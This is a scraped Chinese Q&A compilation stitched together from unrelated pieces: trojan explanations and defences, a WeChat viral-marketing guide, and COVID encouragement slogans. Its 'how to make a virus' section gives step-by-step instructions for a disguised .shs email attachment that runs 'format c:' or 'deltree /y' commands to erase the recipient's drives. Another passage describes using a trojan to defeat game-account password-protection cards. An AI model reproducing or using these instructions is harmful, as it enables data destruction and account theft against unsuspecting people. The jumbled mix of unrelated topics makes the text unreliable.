木马和病毒都是一种人为的程序,都属于电脑病毒,为什么木马要单独提出来说内?大家都知道以前的电脑病毒的作用,其实完全就是为了搞破坏,破坏电脑里的资料数据,除了破坏之外其它无非就是有些病毒制造者为了达到某些目的而进行的威慑和敲诈勒索的作用,或为了炫耀自己的技术. "木马"不一样,木马的作用是赤裸裸的偷偷监视别人和盗窃别人密码,数据等,如盗窃管理员密码-子网密码搞破坏,或者好玩,偷窃上网密码用于它用,游戏帐号,股票帐号,甚至网上银行帐户等.达到偷窥别人隐私和得到经济利益的目的.所以木马的作用比早期的电脑病毒更加有用.更能够直接达到使用者的目的!导致许多别有用心的程序开发者大量的编写这类带有偷窃和监视别人电脑的侵入性程序,这就是目前网上大量木马泛滥成灾的原因.鉴于木马的这些巨大危害性和它与早期病毒的作用性质不一样,所以木马虽然属于病毒中的一类,但是要单独的从病毒类型中间剥离出来.独立的称之为"木马"程序.

一般来说一种杀毒软件程序,它的木马专杀程序能够查杀某某木马的话,那么它自己的普通杀毒程序也当然能够杀掉这种木马,因为在木马泛滥的今天,为木马单独设计一个专门的木马查杀工具,那是能提高该杀毒软件的产品档次的,对其声誉也大大的有益,实际上一般的普通杀毒软件里都包含了对木马的查杀功能.如果现在大家说某某杀毒软件没有木马专杀的程序,那这家杀毒软件厂商自己也好像有点过意不去,即使它的普通杀毒软件里当然的有杀除木马的功能.

还有一点就是,把查杀木马程序单独剥离出来,可以提高查杀效率,现在很多杀毒软件里的木马专杀程序只对木马进行查杀,不去检查普通病毒库里的病毒代码,也就是说当用户运行木马专杀程序的时候,程序只调用木马代码库里的数据,而不调用病毒代码库里的数据,大大提高木马查杀速度.我们知道查杀普通病毒的速度是比较慢的,因为现在有太多太多的病毒.每个文件要经过几万条木马代码的检验,然后再加上已知的差不多有近10万个病毒代码的检验,那速度岂不是很慢了.省去普通病毒代码检验,是不是就提高了效率,提高了速度内? 也就是说现在好多杀毒软件自带的木马专杀程序只查杀木马而一般不去查杀病毒,但是它自身的普通病毒查杀程序既查杀病毒又查杀木马!

三、隐形木马启动方式揭秘
[编辑本段]

大家所熟知的木马程序一般的启动方式有:加载到“开始”菜单中的“启动”项、记录到注册表的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]项和[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]项中,更高级的木马还会注册为系统的“服务”程序,以上这几种启动方式都可以在“系统配置实用程序”(在“开始→运行”中执行“Msconfig”)的“启动”项和“服务”项中找到它的踪迹。

另一种鲜为人知的启动方式,是在“开始→运行”中执行“Gpedit.msc”。打开“组策略”,可看到“本地计算机策略”中有两个选项:“计算机配置”与“用户配置”,展开“用户配置→管理模板→系统→登录”,双击“在用户登录时运行这些程序”子项进行属性设置,选定“设置”项中的“已启用”项并单击“显示”按钮弹出“显示内容”窗口,再单击“添加”按钮,在“添加项目”窗口内的文本框中输入要自启动的程序的路径,如图所示,单击“确定”按钮就完成了。

添加需要启动的文件面

重新启动计算机,系统在登录时就会自动启动你添加的程序,如果刚才添加的是木马程序,那么一个“隐形”木马就这样诞生了。因为用这种方式添加的自启动程序在系统的“系统配置实用程序”是找不到的,同样在我们所熟知的注册表项中也是找不到的,所以非常危险。

通过这种方式添加的自启动程序虽然被记录在注册表中,但是不在我们所熟知的注册表的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]项和[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]项内,而是在册表的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]项。如果你怀疑你的电脑被种了“木马”,可是又找不到它在哪儿,建议你到注册表的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]项里找找吧,或是进入“组策略”的“在用户登录时运行这些程序”看看有没有启动的程序。

现在网页木马无非有以下几种方式中到你的机器里

1:把木马文件改成BMP文件,然后配合你机器里的DEBUG来还原成EXE,网上存在该木马20%

2:下载一个TXT文件到你机器,然后里面有具体的FTP^-^作,FTP连上他们有木马的机器下载木马,网上存在该木马20%

3:也是最常用的方式,下载一个HTA文件,然后用网页控件解释器来还原木马。该木马在网上存在50%以上

4:采用JS脚本,用VBS脚本来执行木马文件,该型木马偷QQ的比较多,偷传奇的少,大概占10%左右

5:ARP欺骗,利用ARP欺骗拦截局域网数据,攻击网关。在数据包中插入木马。解决方案,安装ARP防火墙。

四、防治木马
[编辑本段]

现在我们来说防范的方法
那就是把 windows\system\mshta.exe文件改名,

改成什么自己随便 (xp和win2000是在system32下)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\ 下为Active Setup controls创建一个基于CLSID的新键值 {6E449683_C509_11CF_AAFA_00AA00 B6015C},然后在新键值下创建一个REG_DWORD 类型的键Compatibility,并设定键值为0x00000400即可。

还有windows\command\debug.exe和windows\ftp.exe都给改个名字 (或者删除)

一些最新流行的木马 最有效果的防御~~

比如网络上流行 的木马 smss.exe 这个是其中一种木马的主体 潜伏在 98/winme/xp c:\windows目录下 2000 c:\winnt .....

假如你中了这个木马 首先我们用进程管理器结束 正在运行的木马smss.exe 然后在C:\windows 或 c:\winnt\目录下 创建一个假的 smss.exe 并设置为只读属性~ (2000/XP NTFS的磁盘格式 的话那就更好 可以用“安全设置” 设置为读取) 这样木马没了~ 以后也不会在感染了这个办法本人测试过对很多木马

都很有效果的

经过这样的修改后,我现在专门找别人发的木马网址去测试,实验结果是上了大概20个木马网站,有大概15个瑞星会报警,另外5个瑞星没有反映,而我的机器没有添加出来新的EXE文件,也没有新的进程出现,只不过有些木马的残骸留在了IE的临时文件夹里,他们没有被执行起来,没有危险性,所以建议大家经常清理 临时文件夹和IE

随着病毒编写技术的发展,木马程序对用户的威胁越来越大,尤其是一些木马程序采用了极其狡猾的手段来隐蔽自己,使普通用户很难在中毒后发觉。

防治木马的危害,应该采取以下措施:

第一,安装杀毒软件和个人防火墙,并及时升级。

第二,把个人防火墙设置好安全等级,防止未知程序向外传送数据。

第三,可以考虑使用安全性比较好的浏览器和电子邮件客户端工具。

第四,如果使用IE浏览器,应该安装卡卡安全助手,防止恶意网站在自己电脑上安装不明软件和浏览器插件,以免被木马趁机侵入。

远程控制的木马有:冰河,灰鸽子,上兴,PCshare,网络神偷,FLUX等,现在通过线程插入技术的木马也有很多.现在的木马程序常常和和DLL文件息息相关,被很多人称之为“DLL木马”。DLL木马的最高境界是线程插入技术,线程插入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上说,在Windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存,因此也就拥有了那个远程进程相当的权限。无论怎样,都是让木马的核心代码运行于别的进程的内存空间,这样不仅能很好地隐藏自己,也能更好地保护自己。

DLL不能独立运行,所以要想让木马跑起来,就需要一个EXE文件使用动态嵌入技术让DLL搭上其他正常进程的车,让被嵌入的进程调用这个DLL的 DllMain函数,激发木马运行,最后启动木马的EXE结束运行,木马启动完毕。启动DLL木马的EXE是个重要角色,它被称为Loader, Loader可以是多种多样的,Windows的Rundll32.exe也被一些DLL木马用来作为Loader,这种木马一般不带动态嵌入技术,它直接注入Rundll32进程运行,即使你杀了Rundll32进程,木马本体还是存在的。利用这种方法除了可以启动木马之外,不少应用程序也采用了这种启动方式,一个最常见的例子是“3721网络实名”。

“3721网络实名”就是通过Rundll32调用“网络实名”的DLL文件实现的。在一台安装了网络实名的计算机中运行注册表编辑器,依次展开 “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”,发现一个名为“CnsMin”的启动项,其键值为“Rundll32 C:\WINDOWS\Downlo~1\CnsMin.dll,Rundll32”,CnsMin.dll是网络实名的DLL文件,这样就通过 Rundll32命令实现了网络实名的功能。

简单防御方法

DLL木马的查杀比一般病毒和木马的查杀要更加困难,建议用户经常看看系统的启动项中有没有多出莫名其妙的项目,这是DLL木马Loader可能存在的场所之一。如果用户有一定的编程知识和分析能力,还可以在Loader里查找DLL名称,或者从进程里看多挂接了什么陌生的DLL。对普通用户来说,最简单有效的方法还是用杀毒软件和防火墙来保护自己的计算机安全。现在有一些国外的防火墙软件会在DLL文件加载时提醒用户,比如Tiny、SSM等,这样我们就可以有效地防范恶意的DLL木马了。

全废话,看我的
密报卡解绑过程:
登陆的时候通过木马盗取玩家的密码,并且用盗取的密码进入密码保护卡解除绑定的网页页面,在通过木马把玩家登陆时候的三个密码保护卡数换成密码保护卡解绑需要的三个数,1次就能骗到密码保护卡解除绑定需要的三个数了,再解除绑定,玩家的帐号就跟没密码保护卡一样.电话密码保护也一样,玩家打了电话,然后登陆的时候通过木马让玩家不能连接服务器并盗取玩家的密码,然后盗取账号者就2分内可以上去了盗取玩家财产。

‘陆’ 如何策划病毒式传播做好微信营销

一、微信环境下的病毒式营销
病毒式营销是通过提供有价值的产品或服务,让用户主动对其进行传播实现“营销杠杆”的作用,逐步获得尽人皆知,尽人参与的成效。如今,病毒式营销已经成为网络营销最为独特的手段,被越来越多的商家和网站成功利用。
病毒式营销能在微信平台将传播效益最大下,主要是基于微信的三个特点:相对真实的环境 、朋友圈功能的开发、平台接口的开放。
1、相对真实的环境
微信最早通过导入腾讯qq用户及手机用户的电话簿、以及搜索微信号来进行添加好友,而后微信还能通过LBS(基于用户位置的社交)搜索身边的陌生人与其互打招呼。虽然其方式打破了熟人社交的模式,但依然是将身边的人集中在一个平台中进行互动。这些设定都促使微信传播基于相对真实的环境,微信用户之间的了解与信任度相较于其它平台来说较高,从而微信平台信息的传播真实度也会提高。
2、朋友圈功能的开发
朋友圈功能的开发实质上是微信从单纯的聊天工具到移动社交媒体的转型。朋友圈提供了一个用户信息传播的场所,微信用户可以从朋友圈看到好友上传的动态。可以说,微信朋友圈功能的开发,才让病毒式营销在微信平台上得以生存。
3、平台接口的开放
早前微信平台借口的开放,仅限于对外APP平台开放分享功能。而2015 年刚刚开始,微信 JS SDK(网页开发的工具包)发布。微信此次开放的 SDK站在了另一个高度,它一次性开放了拍摄、录音、语音识别、二维码、地图、支付、分享、卡券等几十个 API。微信给所有做 web 开发的人打开一扇新的大门:使用微信js,就可以调用各种强大的原生能力了!这些对于微信的病毒式营销中各种引爆点的打造无疑是一项强大的助力。
二、微信病毒式营销方式
微信病毒营销本质在于基于微信朋友圈这个相对真实、社交信任度相对较高的背景环境下,利用微信某些特定功能,辅助“病原体”在熟人之间进行更有效地传播,从而达到传播效益的最大化。甚至,可以通过一些小技巧,将热点进行强制性的曝光。下面我总结了一下几种微信病毒式营销方式,并将结合案例进行说明:
1、转发福利式
案例:“饿了么”发红包
通过人的心理------“利己性+利他性”,将整个活动传播开去,再利用红包内的优惠券促使用户消费,从而带动整个平台的销售额。这种活动可以长期进行,人们对经常使用的代金券有长期的需求,但是成本较高。此次活动中,“饿了么”和“格瓦拉”一起进行活动,分摊成本,也不失为一个好的办法。
2、游戏炫耀式
案例:围住神经猫
用户转发不仅是一种娱乐的体验,更是一种对自我的表达,是一种寻求社会认同感的表现。同游戏炫耀式一样,测试的确可以当成引爆点,但是不能很好地进行用户的转化。
4、游戏福利式
案例:“赫莲娜”开年送礼
HR赫莲娜在14年伊始曾做过送“赫”礼的活动,用户只需在微信中回复“我爱HR”即可参与。通过有趣的接宝游戏,可“马”上领取赫莲娜2014全新登录的极致修护晚霜体验装。同时如果分享活动,能得到更多的游戏机会和神秘好礼。游戏过后获得结合身份识别的唯一兑换二维码,让中奖用户到线下专柜领取。
除去该品牌自身的影响力外,该活动趣味性强,礼品充满诱惑力。参与游戏之前会员必须进行注册,这就在提升知名度的同时,也诱导增长了用户量。另外,赫莲娜有线下实体店的空间优势,可以将线下礼品的发放与线上活动同时进行,形成完美的O2O闭环。
5、互动分享式
案例1:“耐克”人人都是摄影师
14年, AKQA与Nike合作,利用微信平台推出 “自由起动”活动。关注nike的微信号,随意上传一张照片,就能即刻收到一张根据照片量身打造的FreeID设计图,上传的照片越是颜色亮丽、对比度高,FREE ID设计图的色彩也就越丰富。将设计图和起动故事分享到微博,还有可能获得一双真正的跑鞋。活动开始的一个月内,已经积累了33090张上传照片。
这种基于微信的互动营销由于活动内容充满创意,新鲜有趣,所以颇具人气。参与用户在关注微信公众号的同时,通过在其它平台的分享将活动传播开去。实际Nike此举上完成了微博、微信粉丝的双向导流。
案例2:九步之遥
电影《一步之遥》上映之时,大众点评推出了“九步之遥”的推广活动。通过与姜文电影9道有关的趣味答题与用户进行互动,最终达到对电影的推广目的。活动中抓住“姜丝”这批用户,利用姜文的影响力实现病毒式营销。
利用HTML5做出的页面有十分酷炫的效果,整个活动富有创意,十分引人入胜。利用了姜文的影响力,部分“姜丝”会去进行主动分享。但诱导分享的力度仍是不够,倘若在游戏中设置分享才可再获得一次答题机会,答题全中有奖励,利用所有用户,而非仅仅是“姜丝”,活动传播的覆盖面则会更广。
6、投票福利式
案例:“丽康宝贝”健康宝宝评选
15年,“丽康宝贝”发起健康宝宝评选活动,通过上传宝贝的照片到平台,为宝贝投票,从而评选出健康宝宝送出奖金。此活动看似为孩子提供了一个展示的平台,实际上是通过父母对孩子的自豪感和初为父母的的表现欲,再加以奖金诱惑让其主动在朋友圈之间传播。通过关注微信号才能参与该活动,收获用户的同时也能造成用户的主动传播,网络票选的确是病毒式营销较稳妥的方式之一。
而活动中的意见领袖与初期平台的粉丝基数也是网络票选能否成功的关键。
7、活动集赞福利式
案例:uber “极限挑战”活动
UBER曾联合THE NORTH FACE推出“1键冒险”活动,用户将活动信息分享到朋友圈集齐88个赞就有可能获取参与到极限挑战的资格。
活动自身同样是有趣有料,通过分享加集赞的方式让想参与的用户主动进行传播,对活动信息进行强制性的曝光,知名度提升很快。然而,想参与活动的人群只是一部分,参与用户让朋友帮忙点赞后由于所需点赞数太多或其它原因,朋友极少数会对活动信息进行二次分享,所以在第二轮传播中不少病毒链将会断掉。所幸一个人集齐需要88个赞,第一轮病毒传播的效益很大。
8、升级集赞福利
案例:大众点评“拼色块”
大众点评经常做升级版的集赞活动,推出某个活动传播给朋友,然后可获取优惠券。其实这种方式是“新瓶装旧酒”,由直接集赞升级为让朋友拼色块,其本质都是让朋友看到这条活动信息。但是游戏可以直接发送给特定的朋友让其为自己点赞,避免分享到朋友圈让全部看到。通过拼色块游戏并不能直接为品牌带来用户,但是因为“优惠券”的使用而不得不成为品牌的用户。这种创新升级式的变相集赞适用于搭配纯福利(不能为用户提供展示面的福利:如现金、话费、优惠券、礼品)进行,而优惠券则是能带来销售额的最佳选择。
三、如何打造微信病毒式营销
在微信的病毒式营销中,好的“病毒”能让品牌的知名度在短期内迅速提升,但是进一步实现用户的增加量却需要结合微信传播的一些技巧,并巧妙给予奖励。微信病毒式营销可以主要从病原体、传播方式、福利三个方面进行阐述。
1、第一把斧:病原体
病原体的创造,必须有趣、有料、最好带有时尚性,或者能提供用户社会认同感才能形成引爆点。综合以上分析,我归纳了一下几种可以造成传播的引爆点:
2、第二把斧:传播机制
当有好的引爆点后,选择恰当的微信曝光机制,以下就我见过的微信传播方式加以总结:
3、第三把斧:福利
福利的分享是病毒式营销的极大助力。分享福利意味着接受分享者参与游戏也可以获取福利。经过归纳后,我将福利分成了一下几种:
1)红包、优惠券
这是电商提升销售额的管用手法,只要与传播方式结合得恰当,通常可有较好的传播效果。
2)手机话费
将话费作为福利的确流行过一段时间,但是用户经历过太多虚假的信息,已经形成疲劳,就目前来说再次形成病毒营销难度系数略高。
3)体验活动的机会
活动要求充满诱惑力。通常是人们通常无法实现的,或者需要很大代价或者精力才可以自己实现。
4)礼品
礼品的选择一定要有特色或者高价值,如:大白公仔与萤火虫公园的门票。没有特色的礼品活动的吸引力会大大降低。礼品的数量也要适中,否则用户认为没有希望得到,也不会参与到其中。
5)无形的感觉
可以通过活动给用户一个展示的平台,满足用户的炫耀、自我满足、虚荣心、喜好(粉丝)等。
6)流量
流量营销在近来很受欢迎,通过将直接或者游戏通关等方式将流量发给用户也是一种不错的选择。
7)游戏机会
转发过后可再获得一次游戏机会,游戏通关后会有礼品或者完成游戏的过程中会获得礼品。
一般来说完整的微信病毒营销需要考虑病原体、传播方式、福利三个方面,针对不同的情况,只考虑其中两个方面也能造成病毒式营销。例如,“饿了吧”等外卖电商只发红包,但是结合活动的点安插在用户下过订单后可获得分享红包给好友的机会,而好友确实也需要这样一个红包。所以福利就直接转化成为病原体。再者,好的游戏无须福利等就能形成病毒,能迅速提升知名度。但是这样操作用户转化率却很低---用户只会玩游戏并不会成为粉丝。如果能加以福利,比如游戏通关后可以到微信后台领取奖励,关注后才可以玩游戏下一关等,用户的转化率会有所得到提升。
策划一次病毒式营销活动必须明确此次推广的目标,是提升知名度、获取用户量还是提升销售额。一个好的营销活动,目标一定要精准,多个目标则会降低整个活动的水准。如果此次活动目的是提升知名度,那么病原体的选择可以尽量轻便一些,选择游戏类的活动、互动或者直接是游戏。如果有用户量的要求,可以在传播过程中添加一些门槛,比如关注微信号后才能参与、注册后才能有获得礼品,而要达到提升销售额的目的则可以用优惠券作为奖励奖励吸引消费。
总之,策划微信病毒营销要参考品牌自身的情况----资金、技术、影响力、粉丝基数、用户黏性等,再从活动病原体、传播机制、以及福利从三个方面考虑,最终得出最适合的营销策划方案。
参考资料:http://www.zicaitou.com/post/381.html

‘柒’ 怎样制做病毒

1.创建一个只包含一个空格(
为了减小文件体积)的文本文件,任意取名。
2.打开{写字板文档},将此文件拖放入{写字板文档}。也可以点击记{写字板
文档}单栏中的“插入\对象”,弹出“插入对象”对话框,选中“从文件创建”,然后
点击“浏览”按钮选择要插入的文件。
3.选中该插入对象的图标,选择菜单栏中的“编辑\包对象\编辑包”(如图1)。在弹
出的“对象包装程序”对话框中,选择菜单栏中的“编辑\命令行”,然后输入如下命令
:start.exe /m format c:/q /autotest /u ,点击“确定”,此时,内容栏中会显示
出命令内容。
4.点击外观栏中的“插入图标”按钮,会弹出一个警告对话框,确认,然后任选一
个图标。
5.选择菜单栏中的“编辑\卷标”,为此嵌入对象取一个名称(会替换原来的文件名
称)。点击“文件”菜单中的“更新”,然后关闭此对话框。
6.将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是“碎片”(在2000下的默
认名为”片段”),现在我们把它改成“password01.txt”。打开电子邮件程序将桌面
上的“password01.txt”作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作
为附件发出。
7.当邮件接收者误将“password01.txt.shs”文件作为“password01.txt”(如前文
所述,“.SHS”扩展名永远是隐藏的)放心地打开时,或打开文件,点击文件中的嵌入对
象时触发恶意命令(弹出DOS运行窗口,执行格式化命令).如果将上面的命令替换为:st
art.exe /m deltree /y a:\*.* c:\*.* d:\*.* 则是将删除对方硬盘下所有文件(盘符
根据实际情况自定义);如果替换为:start.exe /m deltree /y
c:\windows\system\*.* 则是删除对方c:\windows\system\目录底下的所有文件.(当
然大家可以改成其它的命令)
很简单,这样一个病毒的攻击程序被弄出来了

在这前提下是要学好汇编语言 这是最关键的 也是最难的 你说的网站有多种语言写的有 asp .net jsp php 等所以没学好汇编语言 (那就是空谈)

‘捌’ 病毒手抄报内容20字

11、民齐者强,在这场战“疫”中,唯有万众一心、众志成城!面对疫情,团结是最强的免疫力!有英雄的武汉,有英雄的民族,举国同心,我们一定能过关!

12、武汉是英雄的城市,武汉人民、武汉人民是英雄的人民,历史上从来没有被艰难险阻压垮过!疫情防控工作到了最吃劲的关键阶段,更要无惧风雪、奋战到底!

13、我们都应该庆幸我们是中国人。我们都看到了,短时间内只有我国才能完成闭户封城的创举!短时间内只有我国能建造那么多的医院!短时间内只有我国有八方支援的同胞,以及免费治疗新冠肺炎!一线工作者辛苦了!希望疫情早早结束,我爱中国!中国加油!

14、爱与希望,陪伴我们一起渡过难关。武汉加油,中国加油!我们在一起!

15、一群人一条路坚持一直走下去~在一起不容易点亮生命不放弃

16、没有天生的英雄,只有挺身而出的凡人,你们不惧疫情,不畏艰难,毫不犹豫的选择奋斗在抗争冠状病毒的第一线,成为最美逆行者,感谢你们的付出,武汉加油!

17、让我们为武汉加油,为所有在一线坚守的医护人员加油,一起打赢这场防疫战!你们都是平凡而伟大的人。感谢!感恩!敬佩!愿平安。

18、在提及武汉时,钟南山院士几度哽咽,眼含泪光,他坚定地说:武汉,本来就是一个英雄的城市;武汉,是能够过关的!

19、"武汉胜则武汉胜,武汉胜则全国胜。"武汉加油!武汉加油!中国加油!

20、要知道没有人必须在你需要的时候帮你,只有你自己,所以让自己独立坚强快乐幸福,才是你需要做的,毕竟只有自己必须和你生死与共,息息相关。

21、在这个特殊的时刻,祝福大家新年健康快乐,祝福×及武汉人民身体健康,早日战胜疫情!

22、最近阳光好好,春天也要到了,希望疫情早日结束!

23、祝福武汉、祝福×早日康复,祝愿武汉公交早日恢复运转,祝愿每一个人远离病痛!

24、希望春节期间肺炎能过去,大家平安。武汉加油,各省加油!

25、武汉加油,武汉加油,祝福全国人民新年快乐,一切都会好起来的!

26、月有阴睛圆缺,日有朝夕昼夜,天有不测风云,人有旦夕祸福,世事无常多变幻,生命珍贵有短长,我们能做的是坦然面对,处惊不乱,稳中求胜。中华民族总能在灾难面前,不畏惧,不退缩,万众一心,众志成城,祝福武汉,祝福武汉,祝福中国!

27、望全国人民早日战胜病毒,度过难关,武汉加油!